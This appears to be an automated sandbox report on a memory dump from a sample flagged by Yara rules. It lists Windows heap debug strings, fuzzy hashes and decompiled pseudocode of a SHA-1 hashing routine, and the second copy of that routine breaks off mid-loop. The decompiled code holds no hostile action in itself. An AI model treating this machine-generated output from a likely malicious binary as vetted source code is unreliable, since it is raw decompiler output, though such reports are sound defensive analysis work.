                                                        • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                                        • API String ID: 0-2419525547
                                                        • Opcode ID: a7ad74b74d30d82263e1c8b896a711236597c8afaf3a3900c7997f394d8be11f
                                                        • Instruction ID: dd4e9d0405f4464a4a3b2a75b89cfd50eb82f8ee84ca82c6949a0a63b995137d
                                                        • Opcode Fuzzy Hash: a7ad74b74d30d82263e1c8b896a711236597c8afaf3a3900c7997f394d8be11f
                                                        • Instruction Fuzzy Hash: 7C728770604206DFDB28CF14C490ABAB7F1FF4A715F1580E9E84A9B292D731ED85DBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        • HEAP[%wZ]: , xrefs: 00BAD639
                                                        • HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 00BAD65A
                                                        • HEAP: , xrefs: 00BAD646
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                                        • API String ID: 0-2419525547
                                                        • Opcode ID: e803aa1a0543fe6cc44f15a99b00c91c0e1140552352ee5283493c7c2c4e5ede
                                                        • Instruction ID: 3014cfde9910797a099a74508e09a9aba754c068d7786ce2d9112ea0c32adc16
                                                        • Opcode Fuzzy Hash: e803aa1a0543fe6cc44f15a99b00c91c0e1140552352ee5283493c7c2c4e5ede
                                                        • Instruction Fuzzy Hash: 6C02AE706042459FCB28CF28C491BBABBE2EF55301F1484DEE8968B686D734E959DB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %x), xrefs: 00BA9636
                                                        • HEAP[%wZ]: , xrefs: 00BA9616
                                                        • HEAP: , xrefs: 00BA9623
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %x)
                                                        • API String ID: 0-385592399
                                                        • Opcode ID: b407dbf6e52b0be500246f2392323aa351df6f48e3cb33bf9f1604464d58e4c2
                                                        • Instruction ID: e786b91b58f94d248d7ce0e5bf021eee661cc2c87471e41995ea48194fcaf7ab
                                                        • Opcode Fuzzy Hash: b407dbf6e52b0be500246f2392323aa351df6f48e3cb33bf9f1604464d58e4c2
                                                        • Instruction Fuzzy Hash: 60D1CB71A00A5A9FCB15CF69C480BBAB7F0FF18700F2481D9E5699B285D734EE41EB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        • HEAP[%wZ]: , xrefs: 00BB2D07
                                                        • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 00BB2D1F
                                                        • HEAP: , xrefs: 00BB2D14
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                                        • API String ID: 0-1596344177
                                                        • Opcode ID: 66c276eee06d955f7047f38b309e2d28ffa2b6e5325e8899c903d9b520609bb5
                                                        • Instruction ID: df70c3dfcaee5e6f707278976dbbbc4331d8369a840e120b17ce712acadf3349
                                                        • Opcode Fuzzy Hash: 66c276eee06d955f7047f38b309e2d28ffa2b6e5325e8899c903d9b520609bb5
                                                        • Instruction Fuzzy Hash: D7B18871600606DFCB28CF28C4D4A79B7F1FF58711B2986A9E85A8B792D734E980DF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        • HEAP[%wZ]: , xrefs: 00BD58D7
                                                        • Heap block at %p modified at %p past requested size of %lx, xrefs: 00BD58F7
                                                        • HEAP: , xrefs: 00BD58E4
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %lx
                                                        • API String ID: 0-3722492067
                                                        • Opcode ID: 080532d77c5299cbcd882819cb9c6dd551f9dd72977fba7ac966f159dd0ee2c5
                                                        • Instruction ID: 573f91f050286638520e1abdc2eadc4cb17ea25b6094107e68487df30b30379f
                                                        • Opcode Fuzzy Hash: 080532d77c5299cbcd882819cb9c6dd551f9dd72977fba7ac966f159dd0ee2c5
                                                        • Instruction Fuzzy Hash: AE41D035220950DBD7749E19C880AB2B7E1EF04751B9488DAF8D6CB382E626DC46FB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID: *.*$MUI
                                                        • API String ID: 0-3752369296
                                                        • Opcode ID: ce8683e3978dff1870ec1f4bd6a9e8231fa4e616c06213713e982964581ece26
                                                        • Instruction ID: 0f8ca25797b85f8a971d766b8a91b5c189d340ba74db6d22dc3aadeeeebb5228
                                                        • Opcode Fuzzy Hash: ce8683e3978dff1870ec1f4bd6a9e8231fa4e616c06213713e982964581ece26
                                                        • Instruction Fuzzy Hash: A6C17F359116689ACF71DF28CC49B9AB3B8AF48300F1482DAE459E7290EB709FC4CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-3916222277
                                                        • Opcode ID: ad3ffa8fd3cf5a9f2ebcf43eefad3a142d60703c4cbaba246d006a7e48d84fab
                                                        • Instruction ID: dacfe544661bd3aa497d16acc19f83f12f709e76a819c7364cb636bfc2777c22
                                                        • Opcode Fuzzy Hash: ad3ffa8fd3cf5a9f2ebcf43eefad3a142d60703c4cbaba246d006a7e48d84fab
                                                        • Instruction Fuzzy Hash: CCA245729042699FEF219F14CC81BE9BBF5EB09300F1480EAE64DA7291DB749E84DF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8@8
                                                        • API String ID: 0-222468769
                                                        • Opcode ID: 52a7b4fd9904778a68f426b789c55f952f178534bf943c7b801e7968525b1fea
                                                        • Instruction ID: 63c18aa755fa5b34f279f725aacb91a273c036a8b7742ff9f375c181019ca375
                                                        • Opcode Fuzzy Hash: 52a7b4fd9904778a68f426b789c55f952f178534bf943c7b801e7968525b1fea
                                                        • Instruction Fuzzy Hash: A3F15C71A00649AFDF15DFA4C881BAEBBF4EF04704F14849AF855EB291E379D981CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 73%
                                                        			E00409E5B(signed int* _a4, signed int _a1436491247) {
                                                        				signed int _v8;
                                                        				signed int _v12;
                                                        				signed int _v16;
                                                        				char _v304;
                                                        				signed char* _t278;
                                                        				signed int* _t279;
                                                        				signed int _t280;
                                                        				signed int _t286;
                                                        				signed int _t289;
                                                        				signed int _t293;
                                                        				signed int _t296;
                                                        				signed int _t300;
                                                        				signed int _t304;
                                                        				signed int _t306;
                                                        				signed int _t312;
                                                        				signed int _t320;
                                                        				signed int _t322;
                                                        				signed int _t325;
                                                        				signed int _t327;
                                                        				signed int _t336;
                                                        				signed int _t342;
                                                        				signed int _t343;
                                                        				signed int _t348;
                                                        				signed int _t356;
                                                        				signed int _t360;
                                                        				signed int _t361;
                                                        				signed int _t365;
                                                        				signed int _t368;
                                                        				signed int _t372;
                                                        				signed int _t373;
                                                        				signed int _t402;
                                                        				signed int _t407;
                                                        				signed int _t413;
                                                        				signed int _t416;
                                                        				signed int _t423;
                                                        				signed int _t426;
                                                        				signed int _t435;
                                                        				signed int _t437;
                                                        				signed int _t440;
                                                        				signed int _t448;
                                                        				signed int _t463;
                                                        				signed int _t466;
                                                        				signed int _t467;
                                                        				signed int _t468;
                                                        				signed int _t474;
                                                        				signed int _t482;
                                                        				signed int _t483;
                                                        				signed int* _t484;
                                                        				signed int* _t487;
                                                        				signed int _t494;
                                                        				signed int _t497;
                                                        				signed int _t502;
                                                        				signed int _t505;
                                                        				signed int _t508;
                                                        				signed int _t511;
                                                        				signed int _t512;
                                                        				signed int _t516;
                                                        				signed int _t528;
                                                        				signed int _t531;
                                                        				signed int _t538;
                                                        				signed int _t544;
                                                        				signed int _t546;
                                                        				signed int _t547;
                                                        
                                                        				_t547 = _t546 ^ _a1436491247;
                                                        				_t544 = _t547;
                                                        				_t487 = _a4;
                                                        				_t356 = 0;
                                                        				_t3 =  &(_t487[7]); // 0x1b
                                                        				_t278 = _t3;
                                                        				do {
                                                        					 *(_t544 + _t356 * 4 - 0x14c) = ((( *(_t278 - 1) & 0x000000ff) << 0x00000008 |  *_t278 & 0x000000ff) << 0x00000008 | _t278[1] & 0x000000ff) << 0x00000008 | _t278[2] & 0x000000ff;
                                                        					 *(_t544 + _t356 * 4 - 0x148) = (((_t278[3] & 0x000000ff) << 0x00000008 | _t278[4] & 0x000000ff) << 0x00000008 | _t278[5] & 0x000000ff) << 0x00000008 | _t278[6] & 0x000000ff;
                                                        					 *(_t544 + _t356 * 4 - 0x144) = (((_t278[7] & 0x000000ff) << 0x00000008 | _t278[8] & 0x000000ff) << 0x00000008 | _t278[9] & 0x000000ff) << 0x00000008 | _t278[0xa] & 0x000000ff;
                                                        					 *(_t544 + _t356 * 4 - 0x140) = (((_t278[0xb] & 0x000000ff) << 0x00000008 | _t278[0xc] & 0x000000ff) << 0x00000008 | _t278[0xd] & 0x000000ff) << 0x00000008 | _t278[0xe] & 0x000000ff;
                                                        					_t356 = _t356 + 4;
                                                        					_t278 =  &(_t278[0x10]);
                                                        				} while (_t356 < 0x10);
                                                        				_t279 =  &_v304;
                                                        				_v8 = 0x10;
                                                        				do {
                                                        					_t402 =  *(_t279 - 0x18);
                                                        					_t463 =  *(_t279 - 0x14);
                                                        					_t360 =  *(_t279 - 0x20) ^ _t279[5] ^  *_t279 ^ _t402;
                                                        					asm("rol ecx, 1");
                                                        					asm("rol ebx, 1");
                                                        					_t279[9] =  *(_t279 - 0x1c) ^ _t279[6] ^ _t279[1] ^ _t463;
                                                        					_t279[8] = _t360;
                                                        					_t320 = _t279[7] ^  *(_t279 - 0x10) ^ _t279[2];
                                                        					_t279 =  &(_t279[4]);
                                                        					asm("rol ebx, 1");
                                                        					asm("rol edx, 1");
                                                        					_t47 =  &_v8;
                                                        					 *_t47 = _v8 - 1;
                                                        					_t279[6] = _t320 ^ _t402;
                                                        					_t279[7] =  *(_t279 - 0x1c) ^  *(_t279 - 4) ^ _t360 ^ _t463;
                                                        				} while ( *_t47 != 0);
                                                        				_t322 =  *_t487;
                                                        				_t280 = _t487[1];
                                                        				_t361 = _t487[2];
                                                        				_t407 = _t487[3];
                                                        				_v12 = _t322;
                                                        				_v16 = _t487[4];
                                                        				_v8 = 0;
                                                        				do {
                                                        					asm("rol ebx, 0x5");
                                                        					_t466 = _v8;
                                                        					_t494 = _t322 + ( !_t280 & _t407 | _t361 & _t280) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x14c)) + _v16 + 0x5a827999;
                                                        					_t325 = _v12;
                                                        					asm("ror eax, 0x2");
                                                        					_v16 = _t407;
                                                        					_v12 = _t494;
                                                        					asm("rol esi, 0x5");
                                                        					_v8 = _t361;
                                                        					_t413 = _t494 + ( !_t325 & _t361 | _t280 & _t325) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x148)) + _v16 + 0x5a827999;
                                                        					_t497 = _t280;
                                                        					asm("ror ebx, 0x2");
                                                        					_v16 = _v8;
                                                        					_t365 = _v12;
                                                        					_v8 = _t325;
                                                        					_t327 = _v8;
                                                        					_v12 = _t413;
                                                        					asm("rol edx, 0x5");
                                                        					_t286 = _t413 + ( !_t365 & _t497 | _t325 & _t365) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x144)) + _v16 + 0x5a827999;
                                                        					_t416 = _v12;
                                                        					_v16 = _t497;
                                                        					asm("ror ecx, 0x2");
                                                        					_v8 = _t365;
                                                        					_v12 = _t286;
                                                        					asm("rol eax, 0x5");
                                                        					_v16 = _t327;
                                                        					_t502 = _t286 + ( !_t416 & _t327 | _t365 & _t416) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x140)) + _v16 + 0x5a827999;
                                                        					_t361 = _v12;
                                                        					_t289 = _v8;
                                                        					asm("ror edx, 0x2");
                                                        					_v8 = _t416;
                                                        					_v12 = _t502;
                                                        					asm("rol esi, 0x5");
                                                        					_v16 = _t289;
                                                        					_t280 = _v12;
                                                        					_t505 = _t502 + ( !_t361 & _t289 | _t416 & _t361) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x13c)) + _v16 + 0x5a827999;
                                                        					_t407 = _v8;
                                                        					asm("ror ecx, 0x2");
                                                        					_t467 = _t466 + 5;
                                                        					_t322 = _t505;
                                                        					_v12 = _t322;
                                                        					_v8 = _t467;
                                                        				} while (_t467 < 0x14);
                                                        				_t468 = 0x14;
                                                        				do {
                                                        					asm("rol esi, 0x5");
                                                        					asm("ror eax, 0x2");
                                                        					_v16 = _t407;
                                                        					_t508 = _t505 + (_t407 ^ _t361 ^ _t280) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
                                                        					_t336 = _v12;
                                                        					_v12 = _t508;
                                                        					asm("rol esi, 0x5");
                                                        					_t423 = _t508 + (_t361 ^ _t280 ^ _t336) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
                                                        					asm("ror ebx, 0x2");
                                                        					_t511 = _t280;
                                                        					_v16 = _t361;
                                                        					_t368 = _v12;
                                                        					_v12 = _t423;
                                                        					asm("rol edx, 0x5");
                                                        					asm("ror ecx, 0x2");
                                                        					_t293 = _t423 + (_t280 ^ _t336 ^ _t368) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
                                                        					_t426 = _v12;
                                                        					_v8 = _t336;
                                                        					_v8 = _t368;
                                                        					_v12 = _t293;
                                                        					asm("rol eax, 0x5");
                                                        					_t468 = _t468 + 5;
                                                        					_t361 = _v12;
                                                        					asm("ror edx, 0x2");
                                                        					_t147 = _t511 + 0x6ed9eba1; // 0x6ed9eb9f
                                                        					_t512 = _t293 + (_t336 ^ _v8 ^ _t426) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x154)) + _t147;
                                                        					_t296 = _v8;
                                                        					_v8 = _t426;
                                                        					_v12 = _t512;
                                                        					asm("rol esi, 0x5");
                                                        					_t407 = _v8;
                                                        					_t505 = _t512 + (_t296 ^ _v8 ^ _t361) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x150)) + _t336 + 0x6ed9eba1;
                                                        					_v16 = _t296;
                                                        					_t280 = _v12;
                                                        					asm("ror ecx, 0x2");
                                                        					_v12 = _t505;
                                                        				} while (_t468 < 0x28);
                                                        				_v8 = 0x28;
                                                        				do {
                                                        					asm("rol esi, 0x5");
                                                        					_v16 = _t407;
                                                        					asm("ror eax, 0x2");
                                                        					_t516 = ((_t361 | _t280) & _t407 | _t361 & _t280) +  *((intOrPtr*)(_t544 + _v8 * 4 - 0x14c)) + _t505 + _v16 - 0x70e44324;
                                                        					_t474 = _v12;
                                                        					_v12 = _t516;
                                                        					asm("rol esi, 0x5");
                                                        					_t342 = _v8;
                                                        					asm("ror edi, 0x2");
                                                        					_t435 = ((_t280 | _t474) & _t361 | _t280 & _t474) +  *((intOrPtr*)(_t544 + _t342 * 4 - 0x148)) + _t516 + _v16 - 0x70e44324;
                                                        					_v16 = _t361;
                                                        					_t372 = _v12;
                                                        					_v12 = _t435;
                                                        					asm("rol edx, 0x5");
                                                        					_v8 = _t280;
                                                        					_t437 = ((_t474 | _t372) & _t280 | _t474 & _t372) +  *((intOrPtr*)(_t544 + _t342 * 4 - 0x144)) + _t435 + _v16 - 0x70e44324;
                                                        					asm("ror ecx, 0x2");
                                                        					_v16 = _v8;
                                                        					_t300 = _v12;
                                                        					_v8 = _t474;
                                                        					_v12 = _t437;
                                                        					asm("rol edx, 0x5");
                                                        					asm("ror eax, 0x2");
                                                        					_t528 = ((_t372 | _t300) & _t474 | _t372 & _t300) +  *((intOrPtr*)(_t544 + _t342 * 4 - 0x140)) + _t437 + _v16 - 0x70e44324;
                                                        					_v16 = _v8;
                                                        					_t440 = _t372;
                                                        					_t361 = _v12;
                                                        					_v8 = _t440;
                                                        					_v12 = _t528;
                                                        					asm("rol esi, 0x5");
                                                        					_v16 = _v8;
                                                        					_t505 = ((_t300 | _t361) & _t440 | _t300 & _t361) +  *((intOrPtr*)(_t544 + _t342 * 4 - 0x13c)) + _t528 + _v16 - 0x70e44324;
                                                        					_t407 = _t300;
                                                        					_t280 = _v12;
                                                        					asm("ror ecx, 0x2");
                                                        					_v12 = _t505;
                                                        					_t343 = _t342 + 5;
                                                        					_v8 = _t343;
                                                        				} while (_t343 < 0x3c);
                                                        				_t482 = 0x3c;
                                                        				_v8 = 0x3c;
                                                        				do {
                                                        					asm("rol esi, 0x5");
                                                        					_t483 = _v8;
                                                        					asm("ror eax, 0x2");
                                                        					_t531 = (_t407 ^ _t361 ^ _t280) +  *((intOrPtr*)(_t544 + _t482 * 4 - 0x14c)) + _t505 + _v16 - 0x359d3e2a;
                                                        					_t348 = _v12;
                                                        					_v16 = _t407;
                                                        					_v12 = _t531;
                                                        					asm("rol esi, 0x5");
                                                        					asm("ror ebx, 0x2");
                                                        					_t448 = (_t361 ^ _t280 ^ _t348) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x148)) + _t531 + _v16 - 0x359d3e2a;
                                                        					_v16 = _t361;
                                                        					_t373 = _v12;
                                                        					_v12 = _t448;
                                                        					asm("rol edx, 0x5");
                                                        					_v16 = _t280;
                                                        					asm("ror ecx, 0x2");
                                                        					_t304 = (_t280 ^ _t348 ^ _t373) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x144)) + _t448 + _v16 - 0x359d3e2a;
                                                        					_t407 = _v12;
                                                        					_v12 = _t304;
                                                        					asm("rol eax, 0x5");
                                                        					_v16 = _t348;
                                                        					_t538 = (_t348 ^ _t373 ^ _t407) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x140)) + _t304 + _v16 - 0x359d3e2a;
                                                        					_t306 = _t373;
                                                        					_v8 = _t348;
                                                        					asm("ror edx, 0x2");
                                                        					_v8 = _t373;
                                                        					_t361 = _v12;
                                                        					_v12 = _t538;
                                                        					asm("rol esi, 0x5");
                                                        					_t482 = _t483 + 5;
                                                        					_t505 = (_t306 ^ _t407 ^ _t361) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x13c)) + _t538 + _v16 - 0x359d3e2a;
                                                        					_v16 = _t306;
                                                        					_t280 = _v12;
                                                        					asm("ror ecx, 0x2");
                                                        					_v8 = _t407;
                                                        					_v12 = _t505;
                                                        					_v8 = _t482;
                                                        				} while (_t482 < 0x50);
                                                        				_t484 = _a4;
                                                        				_t484[2] = _t484[2] + _t361;
                                                        				_t484[3] = _t484[3] + _t407;
                                                        				_t312 = _t484[4] + _v16;
                                                        				 *_t484 =  *_t484 + _t505;
                                                        				_t484[1] = _t484[1] + _t280;
                                                        				_t484[4] = _t312;
                                                        				_t484[0x17] = 0;
                                                        				return _t312;
                                                        			}



































































                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (
                                                        • API String ID: 0-3887548279
                                                        • Opcode ID: 2367e2ebd7d69b7618874dacd5dc7f9c078024edb5495a80f0c4c088b0a358ed
                                                        • Instruction ID: bfa471cf8b2288c100353908c093c8a0c8cd05edc7202a61451fb4f10511930e
                                                        • Opcode Fuzzy Hash: 2367e2ebd7d69b7618874dacd5dc7f9c078024edb5495a80f0c4c088b0a358ed
                                                        • Instruction Fuzzy Hash: A9021CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 73%
                                                        			E00409E60(signed int* _a4) {
                                                        				signed int _v8;
                                                        				signed int _v12;
                                                        				signed int _v16;
                                                        				char _v304;
                                                        				signed char* _t277;
                                                        				signed int* _t278;
                                                        				signed int _t279;
                                                        				signed int _t285;
                                                        				signed int _t288;
                                                        				signed int _t292;
                                                        				signed int _t295;
                                                        				signed int _t299;
                                                        				signed int _t303;
                                                        				signed int _t305;
                                                        				signed int _t311;
                                                        				signed int _t318;
                                                        				signed int _t320;
                                                        				signed int _t323;
                                                        				signed int _t325;
                                                        				signed int _t334;
                                                        				signed int _t340;
                                                        				signed int _t341;
                                                        				signed int _t346;
                                                        				signed int _t353;
                                                        				signed int _t357;
                                                        				signed int _t358;
                                                        				signed int _t362;
                                                        				signed int _t365;
                                                        				signed int _t369;
                                                        				signed int _t370;
                                                        				signed int _t399;
                                                        				signed int _t404;
                                                        				signed int _t410;
                                                        				signed int _t413;
                                                        				signed int _t420;
                                                        				signed int _t423;
                                                        				signed int _t432;
                                                        				signed int _t434;
                                                        				signed int _t437;
                                                        				signed int _t445;
                                                        				signed int _t459;
                                                        				signed int _t462;
                                                        				signed int _t463;
                                                        				signed int _t464;
                                                        				signed int _t470;
                                                        				signed int _t478;
                                                        				signed int _t479;
                                                        				signed int* _t480;
                                                        				signed int* _t481;
                                                        				signed int _t488;
                                                        				signed int _t491;
                                                        				signed int _t496;
                                                        				signed int _t499;
                                                        				signed int _t502;
                                                        				signed int _t505;
                                                        				signed int _t506;
                                                        				signed int _t510;
                                                        				signed int _t522;
                                                        				signed int _t525;
                                                        				signed int _t532;
                                                        				void* _t536;
                                                        
                                                        				_t481 = _a4;
                                                        				_t353 = 0;
                                                        				_t2 =  &(_t481[7]); // 0x1b
                                                        				_t277 = _t2;
                                                        				do {
                                                        					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
                                                        					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
                                                        					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
                                                        					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
                                                        					_t353 = _t353 + 4;
                                                        					_t277 =  &(_t277[0x10]);
                                                        				} while (_t353 < 0x10);
                                                        				_t278 =  &_v304;
                                                        				_v8 = 0x10;
                                                        				do {
                                                        					_t399 =  *(_t278 - 0x18);
                                                        					_t459 =  *(_t278 - 0x14);
                                                        					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
                                                        					asm("rol ecx, 1");
                                                        					asm("rol ebx, 1");
                                                        					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
                                                        					_t278[8] = _t357;
                                                        					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
                                                        					_t278 =  &(_t278[4]);
                                                        					asm("rol ebx, 1");
                                                        					asm("rol edx, 1");
                                                        					_t46 =  &_v8;
                                                        					 *_t46 = _v8 - 1;
                                                        					_t278[6] = _t318 ^ _t399;
                                                        					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
                                                        				} while ( *_t46 != 0);
                                                        				_t320 =  *_t481;
                                                        				_t279 = _t481[1];
                                                        				_t358 = _t481[2];
                                                        				_t404 = _t481[3];
                                                        				_v12 = _t320;
                                                        				_v16 = _t481[4];
                                                        				_v8 = 0;
                                                        				do {
                                                        					asm("rol ebx, 0x5");
                                                        					_t462 = _v8;
                                                        					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
                                                        					_t323 = _v12;
                                                        					asm("ror eax, 0x2");
                                                        					_v16 = _t404;
                                                        					_v12 = _t488;
                                                        					asm("rol esi, 0x5");
                                                        					_v8 = _t358;
                                                        					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
                                                        					_t491 = _t279;
                                                        					asm("ror ebx, 0x2");
                                                        					_v16 = _v8;
                                                        					_t362 = _v12;
                                                        					_v8 = _t323;
                                                        					_t325 = _v8;
                                                        					_v12 = _t410;
                                                        					asm("rol edx, 0x5");
                                                        					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
                                                        					_t413 = _v12;
                                                        					_v16 = _t491;
                                                        					asm("ror ecx, 0x2");
                                                        					_v8 = _t362;
                                                        					_v12 = _t285;
                                                        					asm("rol eax, 0x5");
                                                        					_v16 = _t325;
                                                        					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
                                                        					_t358 = _v12;
                                                        					_t288 = _v8;
                                                        					asm("ror edx, 0x2");
                                                        					_v8 = _t413;
                                                        					_v12 = _t496;
                                                        					asm("rol esi, 0x5");
                                                        					_v16 = _t288;
                                                        					_t279 = _v12;
                                                        					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
                                                        					_t404 = _v8;
                                                        					asm("ror ecx, 0x2");
                                                        					_t463 = _t462 + 5;
                                                        					_t320 = _t499;
                                                        					_v12 = _t320;
                                                        					_v8 = _t463;
                                                        				} while (_t463 < 0x14);
                                                        				_t464 = 0x14;
                                                        				do {
                                                        					asm("rol esi, 0x5");
                                                        					asm("ror eax, 0x2");
                                                        					_v16 = _t404;
                                                        					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
                                                        					_t334 = _v12;
                                                        					_v12 = _t502;
                                                        					asm("rol esi, 0x5");
                                                        					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
                                                        					asm("ror ebx, 0x2");
                                                        					_t505 = _t279;
                                                        					_v16 = _t358;
                                                        					_t365 = _v12;
                                                        					_v12 = _t420;
                                                        					asm("rol edx, 0x5");
                                                        					asm("ror ecx, 0x2");
                                                        					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
                                                        					_t423 = _v12;
                                                        					_v8 = _t334;
                                                        					_v8 = _t365;
                                                        					_v12 = _t292;
                                                        					asm("rol eax, 0x5");
                                                        					_t464 = _t464 + 5;
                                                        					_t358 = _v12;
                                                        					asm("ror edx, 0x2");
                                                        					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
                                                        					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
                                                        					_t295 = _v8;
                                                        					_v8 = _t423;
                                                        					_v12 = _t506;
                                                        					asm("rol esi, 0x5");
                                                        					_t404 = _v8;
                                                        					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
                                                        					_v16 = _t295;
                                                        					_t279 = _v12;
                                                        					asm("ror ecx, 0x2");
                                                        					_v12 = _t499;
                                                        				} while (_t464 < 0x28);
                                                        				_v8 = 0x28;
                                                        				do {
                                                        					asm("rol esi, 0x5");
                                                        					_v16 = _t404;
                                                        					asm("ror eax, 0x2");
                                                        					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
                                                        					_t470 = _v12;
                                                        					_v12 = _t510;
                                                        					asm("rol esi, 0x5");
                                                        					_t340 = _v8;
                                                        					asm("ror edi, 0x2");
